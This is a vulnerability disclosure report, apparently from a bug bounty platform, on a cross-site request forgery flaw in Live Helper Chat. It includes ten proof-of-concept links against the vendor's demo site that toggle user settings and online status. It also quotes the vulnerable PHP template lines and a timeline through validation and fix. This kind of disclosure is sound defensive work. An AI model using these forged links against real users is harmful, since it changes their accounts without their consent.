Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on

Dec 14th 2021


Description

CSRF in switching between enable and disable of the following:

- Dark/bright  
- Auto uppercase sentences  
- Do not scroll to the bottom on chat open  
- Auto preload previous visitor chat messages  
- Load previous message on scroll  
- New messages  
- New chats  
- Online  
- Based on activity  
- Visible  

Proof of Concept

<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>

Impact

This vulnerability is capable of tricking users to enable/disable personal settings on their accounts.

Occurences

  • Auto preload previous visitor chat messages
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/auto_preload/<?php echo erLhcoreClassModelUserSetting::getSetting('auto_preload',0) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('auto_preload',0) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Auto preload previous visitor chat messages');?></a>
  • Dark/bright
<a title="<?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('chat/user_settings','Toggle between dark and white themes');?>" href="<?php echo erLhcoreClassDesign::baseurl('front/switchdashboard')?>/(action)/mode" class="dropdown-item pl-2"><span class="material-icons">settings_brightness</span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Dark/bright');?></a>

New chats

New messages

  • Auto uppercase sentences
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/auto_uppercase/<?php echo erLhcoreClassModelUserSetting::getSetting('auto_uppercase',1) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('auto_uppercase',1) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Auto uppercase sentences');?></a>
  • Load previous message on scroll
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/scroll_load/<?php echo erLhcoreClassModelUserSetting::getSetting('scroll_load',1) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('scroll_load',1) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Load previous message on scroll');?></a>
  • Do not scroll to the bottom on chat open
<a href="<?php echo erLhcoreClassDesign::baseurl('user/setsetting')?>/no_scroll_bottom/<?php echo erLhcoreClassModelUserSetting::getSetting('no_scroll_bottom',0) == 0 ? 1 : 0?>" class="dropdown-item pl-2"><span class="material-icons"><?php erLhcoreClassModelUserSetting::getSetting('no_scroll_bottom',0) ? print 'check' : print 'remove_done'?></span><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('user/account','Do not scroll to the bottom on chat open');?></a>
We are processing your report and will contact the livehelperchat team within 24 hours. a month ago
KhanhCM modified their report
a month ago
We have contacted a member of the livehelperchat team and are waiting to hear back a month ago
Remigijus Kiminas validated this vulnerability a month ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on 2a98c6 a month ago
The fix bounty has been dropped
user_box.tpl.php#L88 has been validated
user_box.tpl.php#L79 has been validated
user_box.tpl.php#L85 has been validated
user_box.tpl.php#L30 has been validated
user_box.tpl.php#L82 has been validated
lh.js#L3419 has been validated
lh.js#L3401 has been validated